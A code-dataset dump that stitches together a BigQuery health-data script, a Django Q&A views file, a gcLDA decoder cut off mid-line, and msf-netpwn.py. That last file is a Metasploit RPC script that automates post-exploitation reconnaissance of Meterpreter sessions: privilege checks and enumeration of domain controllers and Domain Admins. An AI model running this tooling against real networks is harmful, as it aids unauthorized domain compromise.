`chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (4)\"\"\"\n\n ## National Risk Factor data\n queryNRF = \"\"\"SELECT * FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors`\"\"\"\n\n ## assigning appropriate query\n if(cat == 'all'):\n query = queryWhole\n elif(cat == 'mom'):\n query = queryMom\n elif(cat == 'child'):\n query = queryChild\n elif(cat == 'infant'):\n query = queryInfant\n elif(cat == 'nrf'):\n query = queryNRF\n\n return query\n\n\ndef run_SQL(dbConn, queryString):\n return dbConn.query(queryString).to_dataframe()\n\n## get indicators\ndef get_indicators():\n global dbConn\n queryInd = \"\"\"select case when VarCode='Currently.BF' then 'Currently_BF' when VarCode='Migrant.Status' then 'Migrant_Status'\n when VarCode='Ever.BF' then 'Ever_BF' else Varcode end as Ind \n from (select distinct varcode from `chmdev.DATASETCHM2021_D1.WIC_Codelookup`\n where Dataset= 'WIC' and VarType= 'Indicator' and Varcode \n not in ('FamilyIncome', 'Nutritional.Risk.check', 'Income.Period', 'NRFactor') order by Varcode asc )\"\"\"\n\n dfInd = run_SQL(dbConn,queryInd)\n return dfInd\n\n## get dimensions\ndef get_dimensions():\n global dbConn\n queryDim = \"\"\"select distinct Dim from (select case \n when Varcode in ('AgeRangeMoms', 'AgeRangeChild', 'AgeRangeInfant' ) then 'AgeRange' \n else Varcode end as Dim from `chmdev.DATASETCHM2021_D1.WIC_Codelookup` \n where Dataset= 'WIC' and VarType= 'Dimension' and Varcode not in ('NRFactor'))\"\"\"\n\n dfDim = run_SQL(dbConn,queryDim)\n return dfDim\n\n## get population estimates\ndef get_pop():\n global dbConn\n ##[['ZipCode','ChildPopulation','MomPopulation']]\n queryPop = \"\"\" select * from `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019`\"\"\"\n dfPop = run_SQL(dbConn, queryPop)\n dfPop['PopEstimates'] = dfPop['ChildPopulation'] + dfPop['MomPopulation']\n return dfPop\n\ndef get_riskf():\n global dbConn\n queryRisk = \"\"\" SELECT distinct RF_TYPE_RISK_FACTOR_TYPE_ID as col1 \n FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors` where HIGH_RISK_FLAG=1 \"\"\"\n\n dfRisk = run_SQL(dbConn,queryRisk)\n return dfRisk\n\ndef get_risk_factors(dfRisk):\n riskList = dfRisk.iloc[:,0].tolist()\n return riskList\n\n\ndef get_risk_counts(dfWICRisk):\n dfRiskMelt = pd.melt(dfWICRisk, id_vars=\"Family_zip\")\n\n # dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list()\n # kind of gather ***** check later\n ##dfCrossTabRisk = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list())\n\n # dfRiskMelt[1:10]\n\n # dfRiskSpreadOut = pd.crosstab(index=[dfRiskMelt['Family_zip'],dfRiskMelt['variable']], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = dfRiskSpreadOut.reset_index()\n dfRiskZipCountMelt = pd.melt(dfRiskSpreadOut, id_vars=[\"Family_zip\"], var_name='RiskID', value_name='Count')\n\n ## Do not delete these 2 comments\n dfRiskZipCountMelt = dfRiskZipCountMelt.sort_values(by=['Count'], ascending=False)\n # dfRiskZipCountMelt['Count_Denom'].sum()\n\n return dfRiskZipCountMelt\n\n## get totals for that zip in the data in WIC data\ndef get_zip_counts(dfWIC):\n dfWICZip = dfWIC[['Case_ID', 'Family_zip']]\n dfWICZipCounts = dfWICZip.groupby('Family_zip')['Family_zip'].count().reset_index(name='Zip_Counts')\n return dfWICZipCounts\n\n## get age unadjusted rates\ndef get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts):\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID',right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfZipCounts, left_on='Family_zip',right_on='Family_zip')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip','Count', 'CrossWalk','Zip_Counts']]\n dfFinal['Percentage'] = dfFinal['Count']/dfFinal['Zip_Counts']\n\n return dfFinal.drop_duplicates()\n\n## get age/population adjusted rates\ndef get_adjusted(dfWICNRF, dfRiskCount, dfPop):\n\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID', right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfPop, left_on='Family_zip', right_on='ZipCode')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip', 'Count', 'CrossWalk', 'PopEstimates', '']]\n dfFinal['Percentage'] = dfFinal['Count'] / dfFinal['PopEstimates']\n\n return dfFinal.drop_duplicates()\n\n\n## run the Stratification by Risk factors\ndef run_strat_rf():\n ## WIC whole\n query = specificQuery('all')\n dfWIC = run_SQL(dbConn, query)\n\n ##WIC NRF\n query = specificQuery('nrf')\n dfWICNRF = run_SQL(dbConn, query)\n\n ## getting the risk factors\n riskList = ['risk_1', 'risk_2', 'risk_3', 'risk_4', 'risk_5', 'risk_6', 'risk_7',\n 'risk_8', 'risk_9', 'risk_10', 'Family_zip']\n dfWICRisk = dfWIC[riskList]\n dfRiskCount = get_risk_counts(dfWICRisk)\n dfZipCounts = get_zip_counts(dfWIC)\n print(dfRiskCount.head())\n print(dfZipCounts.head())\n # m = ZIP counts\n # df = dfRisk counts\n # WIC_NRF\n dfUnadj = get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts)\n print(dfUnadj.head)\n dfAdj = get_adjusted(dfWICNRF, dfRiskCount, get_pop())\n print(dfAdj.head())\n\ndef run_wic_state_au():\n\n pass\n\n\ndef main():\n ## Steps\n \"\"\"\n 1. read the data from db\n 2. read the codelook ups\n 3. group/slice the data for respective sections\n 4. perform analysis - current version has 3 functions\n 5. ? add metadata\n 6. ? combine the results.\n :return:\n \"\"\"\n ## 1. function to run stratification by risk factor\n run_strat_rf()\n\n ## 2. function to run functions for combinations\n\n\n\n## main function\nif (__name__ == '__main__'):\n print(\"Script initiated\")\n main()\n print(\"Script ended\")\n\n\n\n\n\n\n", "sub_path": "wic_draft.py", "file_name": "wic_draft.py", "file_ext": "py", "file_size_in_byte": 8125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 14, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 21, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.melt", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "56638927", "text": "from django.shortcuts import render\nfrom django.shortcuts import render, Http404, get_object_or_404, HttpResponsePermanentRedirect\nfrom django.http import HttpResponse\nfrom models import Question, Answer\nfrom forms import AskForm, AnswerForm\nfrom django.core.paginator import Paginator\n\ndef test(request, page=2):\n return HttpResponse(''+page+'')\n\ndef error (request, *args, **kwargs):\n raise Http404('Not working')\n# Create your views here.\ndef qa_new(request):\n last_questions = Question.objects.order_by('id')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page', 1)\n paginator = Paginator(last_questions, limit)\n paginator.baseurl = '/?page='\n page = paginator.page(page)\n return render(request, 'qa_new.html', {\n 'last_questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_popular(request):\n questions = Question.objects.order_by('-rating')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page')\n paginator = Paginator(questions, limit)\n paginator.baseurl = '/popular/?page='\n page = paginator.page(page)\n return render(request, 'qa_popular.html', {\n 'questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n answers = Answer.objects.filter(question=question_id)\n if request.method is 'POST':\n return answer_form(request)\n form = AnswerForm()\n context = {\n 'title': question.title,\n 'text': question.text,\n 'answers': answers,\n 'rating': question.rating,\n 'from': form,\n }\n return render(request, 'qa_question.html', context)\n", "sub_path": "ask/qa/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.Http404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Question", "line_number": 41, "usage_type": "argument"}, {"api_name": "models.Answer.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.AnswerForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "321796321", "text": "#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\nimport time\nimport signal\nimport msfrpc\nimport asyncio\nimport argparse\nimport netifaces\nfrom IPython import embed\nfrom termcolor import colored\nfrom netaddr import IPNetwork, AddrFormatError\nfrom subprocess import Popen, PIPE, CalledProcessError\n\nBUSY_SESSIONS = []\n\ndef parse_args():\n # Create the arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--hostlist\", help=\"Host list file\")\n parser.add_argument(\"-p\", \"--password\", default='123', help=\"Password for msfrpc\")\n parser.add_argument(\"-u\", \"--username\", default='msf', help=\"Username for msfrpc\")\n return parser.parse_args()\n\n# Colored terminal output\ndef print_bad(msg):\n print((colored('[-] ', 'red') + msg))\n\ndef print_info(msg):\n print((colored('[*] ', 'blue') + msg))\n\ndef print_good(msg):\n print((colored('[+] ', 'green') + msg))\n\ndef print_great(msg):\n print((colored('[!] {}'.format(msg), 'yellow', attrs=['bold'])))\n\ndef kill_tasks():\n print()\n print_info('Killing tasks then exiting...')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\ndef get_iface():\n '''\n Gets the right interface for Responder\n '''\n try:\n iface = netifaces.gateways()['default'][netifaces.AF_INET][1]\n except:\n ifaces = []\n for iface in netifaces.interfaces():\n # list of ipv4 addrinfo dicts\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\n\n for entry in ipv4s:\n addr = entry.get('addr')\n if not addr:\n continue\n if not (iface.startswith('lo') or addr.startswith('127.')):\n ifaces.append(iface)\n\n iface = ifaces[0]\n\n return iface\n\ndef get_local_ip(iface):\n '''\n Gets the the local IP of an interface\n '''\n ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']\n return ip\n\nasync def get_shell_info(CLIENT, sess_num):\n sysinfo_cmd = 'sysinfo'\n sysinfo_end_str = b'Meterpreter : '\n\n sysinfo_output = await run_session_cmd(CLIENT, sess_num, sysinfo_cmd, sysinfo_end_str)\n # Catch error\n if type(sysinfo_output) == str:\n return sysinfo_output\n\n else:\n sysinfo_utf8_out = sysinfo_output.decode('utf8')\n sysinfo_split = sysinfo_utf8_out.splitlines()\n\n getuid_cmd = 'getuid'\n getuid_end_str = b'Server username:'\n\n getuid_output = await run_session_cmd(CLIENT, sess_num, getuid_cmd, getuid_end_str)\n # Catch error\n if type(getuid_output) == str:\n return getuid_output\n else:\n getuid_utf8_out = getuid_output.decode('utf8')\n getuid = 'User : '+getuid_utf8_out.split('Server username: ')[-1].strip().strip()\n\n # We won't get here unless there's no errors\n shell_info_list = [getuid] + sysinfo_split\n\n return shell_info_list\n\ndef get_domain(shell_info):\n for l in shell_info:\n l_split = l.split(':')\n if 'Domain ' in l_split[0]:\n if 'WORKGROUP' in l_split[1]:\n return False\n else:\n domain = l_split[-1].strip()\n return domain\n\ndef is_domain_joined(user_info, domain):\n info_split = user_info.split(':')\n dom_and_user = info_split[1].strip()\n dom_and_user_split = dom_and_user.split('\\\\')\n dom = dom_and_user_split[0]\n user = dom_and_user_split[1]\n if domain:\n if dom.lower() in domain.lower():\n return True\n\n return False\n\ndef print_shell_data(shell_info, admin_shell, local_admin, sess_num_str):\n print_info('New shell info')\n for l in shell_info:\n print(' '+l)\n msg = ''' Admin shell : {}\n Local admin : {}\n Session number : {}'''.format( \n admin_shell.decode('utf8'), \n local_admin.decode('utf8'),\n sess_num_str)\n print(msg)\n\nasync def sess_first_check(CLIENT, session, sess_num):\n if b'first_check' not in session:\n print_good('Session {} found, gathering shell info...'.format(str(sess_num)))\n\n # Give meterpeter chance to open\n await asyncio.sleep(2)\n\n sess_num_str = str(sess_num)\n session[b'first_check'] = b'False'\n session[b'session_number'] = sess_num_str.encode()\n\n shell_info = await get_shell_info(CLIENT, sess_num)\n # Catch errors\n if type(shell_info) == str:\n session[b'error'] = shell_info.encode()\n return session\n\n # returns either a string of the domain name or False\n domain = get_domain(shell_info)\n if domain:\n session[b'domain'] = domain.encode()\n\n domain_joined = is_domain_joined(shell_info[0], domain)\n if domain_joined == True:\n session[b'domain_joined'] = b'True'\n else:\n session[b'domain_joined'] = b'False'\n\n admin_shell, local_admin = await is_admin(CLIENT, sess_num)\n # Catch errors\n if type(admin_shell) == str:\n session[b'error'] = admin_shell.encode()\n return session\n\n session[b'admin_shell'] = admin_shell\n session[b'local_admin'] = local_admin\n\n print_shell_data(shell_info, admin_shell, local_admin, sess_num_str)\n\n return session\n\nasync def is_admin(CLIENT, sess_num):\n cmd = 'run post/windows/gather/win_privs'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, None)\n # Catch error\n if type(output) == str:\n return (output, None)\n\n if output:\n split_out = output.decode('utf8').splitlines()\n user_info_list = split_out[5].split()\n admin_shell = user_info_list[0]\n system = user_info_list[1]\n local_admin = user_info_list[2]\n user = user_info_list[5]\n\n # Byte string\n return (str(admin_shell).encode(), str(local_admin).encode())\n\n else:\n return (b'ERROR', b'ERROR')\n\nasync def get_domain_controller(CLIENT, domain_data, sess_num):\n print_info('Getting domain controller...')\n cmd = 'run post/windows/gather/enum_domains'\n end_str = b'[+] Domain Controller:'\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n if 'Domain Controller: ' in output:\n dc = output.split('Domain Controller: ')[-1].strip()\n domain_data['domain_controllers'].append(dc)\n print_good('Domain controller: '+dc)\n else:\n print_bad('No domain controller found')\n\n return domain_data\n\nasync def get_domain_admins(CLIENT, domain_data, sess_num):\n print_info('Getting domain admins...')\n cmd = 'run post/windows/gather/enum_domain_group_users GROUP=\"Domain Admins\"'\n end_str = b'[+] User list'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n da_line_start = '[*] \\t'\n\n if da_line_start in output:\n split_output = output.splitlines()\n print_info('Domain admins:')\n\n domain_admins = []\n for l in split_output:\n if l.startswith(da_line_start):\n domain_admin = l.split(da_line_start)[-1].strip()\n domain_admins.append(domain_admin)\n print(' '+domain_admin)\n domain_data['domain_admins'] = domain_admins\n\n else:\n print_bad('No domain admins found')\n sys.exit()\n\n return domain_data\n\nasync def get_domain_data(CLIENT, session, sess_num, domain_data):\n # Check if we did domain recon yet\n if domain_data['domain_admins'] == []:\n if session[b'domain_joined'] == b'True':\n domain_data = await get_domain_controller(CLIENT, domain_data, sess_num)\n domain_data = await get_domain_admins(CLIENT, domain_data, sess_num)\n\n return domain_data\n\nasync def attack_with_sessions(CLIENT, sessions, domain_data):\n\n if len(sessions) > 0:\n\n for s in sessions:\n\n # Get and print session info if first time we've checked the session\n sessions[s] = await sess_first_check(CLIENT, sessions[s], s)\n \n # Update domain data\n if b'domain' in sessions[s]:\n domain_data['domains'].append(sessions[s][b'domain'])\n\n if domain_data['domain_admins'] == []:\n domain_data = await get_domain_data(CLIENT, sessions[s], s, domain_data)\n\n return (sessions, domain_data)\n\ndef get_output(CLIENT, cmd, sess_num):\n output = CLIENT.call('session.meterpreter_read', [str(sess_num)])\n\n # Everythings fine\n if b'data' in output:\n return output[b'data']\n\n # Got an error from the CLIENT.call\n elif b'error_message' in output:\n decoded_err = output[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, decoded_err))\n return decoded_err\n\n # Some other error catchall\n else:\n return cmd\n\ndef get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs):\n script_errors = [b'[-] post failed', \n b'error in script', \n b'operation failed', \n b'unknown command', \n b'operation timed out']\n\n # Got an error from output\n if any(x in output.lower() for x in script_errors):\n print_bad(('Command [{}] in session {} '\n 'failed with error: {}'\n ).format(cmd, str(sess_num), output.decode('utf8')))\n return cmd, counter\n\n # If no terminating string specified just wait til timeout\n if output == b'':\n counter += sleep_secs\n if counter > timeout:\n print_bad('Command [{}] in session {} timed out'.format(cmd, str(sess_num)))\n return 'timed out', counter\n\n # No output but we haven't reached timeout yet\n return output, counter\n\nasync def run_session_cmd(CLIENT, sess_num, cmd, end_str, timeout=30):\n ''' Will only return a str if we failed to run a cmd'''\n global BUSY_SESSIONS\n\n error_msg = 'Error in session {}: {}'\n sess_num_str = str(sess_num)\n\n print_info('Running [{}] on session {}'.format(cmd, str(sess_num)))\n\n while sess_num in BUSY_SESSIONS:\n await asyncio.sleep(.1)\n\n BUSY_SESSIONS.append(sess_num)\n\n res = CLIENT.call('session.meterpreter_run_single', [str(sess_num), cmd])\n\n if b'error_message' in res:\n err_msg = res[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, err_msg))\n return err_msg\n\n elif res[b'result'] == b'success':\n\n counter = 0\n sleep_secs = 0.5\n\n try:\n while True:\n await asyncio.sleep(sleep_secs)\n\n output = get_output(CLIENT, cmd, sess_num)\n # Error from meterpreter console\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Successfully completed\n if end_str:\n if end_str in output:\n BUSY_SESSIONS.remove(sess_num)\n return output\n # If no end_str specified just return once we have any data\n else:\n if len(output) > 0:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Check for errors from cmd's output\n output, counter = get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs)\n # Error from cmd output including timeout\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # This usually occurs when the session suddenly dies or user quits it\n except Exception as e:\n err = 'exception below likely due to abrupt death of session'\n print_bad(error_msg.format(sess_num_str, err))\n print_bad(' '+str(e))\n BUSY_SESSIONS.remove(sess_num)\n return err\n\n # b'result' not in res, b'error_message' not in res, just catch everything else as an error\n else:\n print_bad(res[b'result'].decode('utf8'))\n BUSY_SESSIONS.remove(sess_num)\n return cmd\n \ndef get_perm_token(CLIENT):\n # Authenticate and grab a permanent token\n CLIENT.login(args.username, args.password)\n CLIENT.call('auth.token_add', ['123'])\n CLIENT.token = '123'\n return CLIENT\n\ndef filter_broken_sessions(updated_sessions):\n ''' We remove 2 kinds of errored sessions: 1) timed out on sysinfo 2) shell died abruptly '''\n unbroken_sessions = {}\n\n for s in updated_sessions:\n if b'error' in updated_sessions[s]:\n # Session timed out on initial sysinfo cmd\n if b'domain' not in updated_sessions[s]:\n continue\n # Session abruptly died\n elif updated_sessions[s][b'error'] == b'exception below likely due to abrupt death of session':\n continue\n\n unbroken_sessions[s] = updated_sessions[s]\n\n return unbroken_sessions\n\ndef update_sessions(sessions, updated_sessions):\n ''' Four keys added after we process a new session: \n first_check, domain_joined, local_admin, admin_shell \n This function does not overwrite data from MSF\n it only adds previously known data to the MSF session'''\n if updated_sessions:\n udpated_sessions = filter_broken_sessions(updated_sessions)\n\n # s = session number, sessions[s] = session data dict\n for s in sessions:\n if s in updated_sessions:\n for k in updated_sessions[s]:\n if k not in sessions[s]:\n sessions[s][k] = updated_sessions[s].get(k)\n\n return sessions\n\nasync def check_for_sessions(CLIENT):\n domain_data = {'domains':[], \n 'domain_controllers':[], \n 'domain_admins':[], \n 'err':[]}\n updated_sessions = None\n print_info('Waiting for Meterpreter shell')\n\n while True:\n\n # Get list of MSF sessions from RPC server\n sessions = CLIENT.call('session.list')\n\n # Update the session info dict with previously found information\n sessions = update_sessions(sessions, updated_sessions)\n\n # Do stuff with the sessions\n updated_sessions, domain_data = await attack_with_sessions(CLIENT, sessions, domain_data)\n \n await asyncio.sleep(10)\n\ndef main(args):\n\n CLIENT = msfrpc.Msfrpc({})\n CLIENT = get_perm_token(CLIENT)\n\n loop = asyncio.get_event_loop()\n loop.add_signal_handler(signal.SIGINT, kill_tasks)\n task = asyncio.ensure_future(check_for_sessions(CLIENT))\n try:\n loop.run_until_complete(task)\n except asyncio.CancelledError:\n print_info('Tasks gracefully downed a cyanide pill before defecating themselves and collapsing in a twitchy pile')\n finally:\n loop.close()\n\nif __name__ == \"__main__\":\n args = parse_args()\n if os.geteuid():\n print_bad('Run as root')\n sys.exit()\n main(args)\n\n", "sub_path": "msf-netpwn.py", "file_name": "msf-netpwn.py", "file_ext": "py", "file_size_in_byte": 15336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 29, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 32, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 35, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 38, "usage_type": "call"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 43, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 43, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 51, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "netifaces.interfaces", "line_number": 54, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 56, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 56, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 73, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 73, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 251, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 451, "usage_type": "call"}, {"api_name": "msfrpc.Msfrpc", "line_number": 455, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 458, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "asyncio.ensure_future", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.geteuid", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 472, "usage_type": "call"}]}
+{"seq_id": "598225079", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nClass and functions for functional decoding.\n\"\"\"\nfrom __future__ import print_function, division\n\nfrom builtins import object\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom nilearn.masking import apply_mask, unmask\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom .due import due, Doi\n\n\n@due.dcite(Doi('10.1371/journal.pcbi.1005649'),\n description='Describes decoding methods using GC-LDA.')\nclass Decoder(object):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n def __init__(self, model):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n self.model = model\n self.dataset = model.dataset\n\n def decode_roi(self, roi, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for discrete image inputs (e.g., regions\n of interest, significant clusters).\n\n 1. Compute p_topic_g_voxel.\n - I think you need p_voxel_g_topic for this, then you do:\n - p_topic_g_voxel = p_voxel_g_topic * p_topic / p_voxel\n - What is p_voxel here?\n 2. Compute topic weight vector (tau_t).\n - topic_weights = np.sum(p_topic_g_voxel, axis=1) (across voxels)\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your selected studies.\n \"\"\"\n if type(roi) == str:\n roi = nib.load(roi)\n\n if not np.array_equal(roi.affine, self.model.dataset.mask_img.affine):\n str1 = np.array2string(roi.affine)\n str2 = np.array2string(self.model.dataset.mask_img.affine)\n raise ValueError('Input roi must have same affine as mask img:'\n '\\n{0}\\n{1}'.format(str1, str2))\n\n # Load ROI file and get ROI voxels overlapping with brain mask\n roi_arr = roi.get_data() & self.model.dataset.mask_img.get_data()\n roi_voxels = np.where(roi_arr > 0)[0]\n\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n p_topic_g_roi = p_topic_g_voxel[roi_voxels, :] # p(T|V) for voxels in ROI only\n topic_weights = np.sum(p_topic_g_roi, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def decode_continuous(self, image, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for continuous inputs (e.g.,\n unthresholded statistical maps).\n\n 1. Compute p_topic_g_voxel.\n 2. Compute topic weight vector (tau_t) by multiplying p_topic_g_voxel\n by input image.\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your map, but the values are scaled based on the input image, so\n they won't necessarily mean much.\n \"\"\"\n # Load image file and get voxel values\n input_values = apply_mask(image, self.model.dataset.mask_img)\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n topic_weights = np.abs(np.squeeze(np.dot(p_topic_g_voxel.T, input_values[:, None])))\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def encode(self, text, out_file=None, topic_priors=None):\n \"\"\"\n Perform text-to-image encoding.\n\n 1. Compute p_topic_g_word.\n - p_topic_g_word = p_word_g_topic * p_topic / p_word\n - p_topic is uniform (1/n topics)\n 2. Compute topic weight vector (tau_t).\n - tau_t = np.sum(p_topic_g_word, axis=1) (across words)\n 3. Multiply tau_t by topic-by-voxel matrix of smoothed p_voxel_g_topic\n (A; not sure where it is, but I don't think it's the same as A in\n model.py).\n 4. The resulting map (tau_t*A) is the encoded image. Values are *not*\n probabilities.\n \"\"\"\n if isinstance(text, list):\n text = ' '.join(text)\n\n # Assume that words in word_labels are underscore-separated.\n # Convert to space-separation for vectorization of input string.\n vocabulary = [term.replace('_', ' ') for term in self.model.dataset.word_labels]\n max_len = max([len(term.split(' ')) for term in vocabulary])\n vectorizer = CountVectorizer(vocabulary=self.model.dataset.word_labels,\n ngram_range=(1, max_len))\n word_counts = np.squeeze(vectorizer.fit_transform([text]).toarray())\n keep_idx = np.where(word_counts > 0)[0]\n text_counts = word_counts[keep_idx]\n\n n_topics_per_word_token = np.sum(self.model.n_word_tokens_word_by_topic, axis=1)\n p_topic_g_word = self.model.n_word_tokens_word_by_topic / n_topics_per_word_token[:, None]\n p_topic_g_word = np.nan_to_num(p_topic_g_word, 0)\n p_topic_g_text = p_topic_g_word[keep_idx] # p(T|W) for words in text only\n prod = p_topic_g_text * text_counts[:, None] # Multiply p(T|W) by words in text\n topic_weights = np.sum(prod, axis=0) # Sum across words\n if 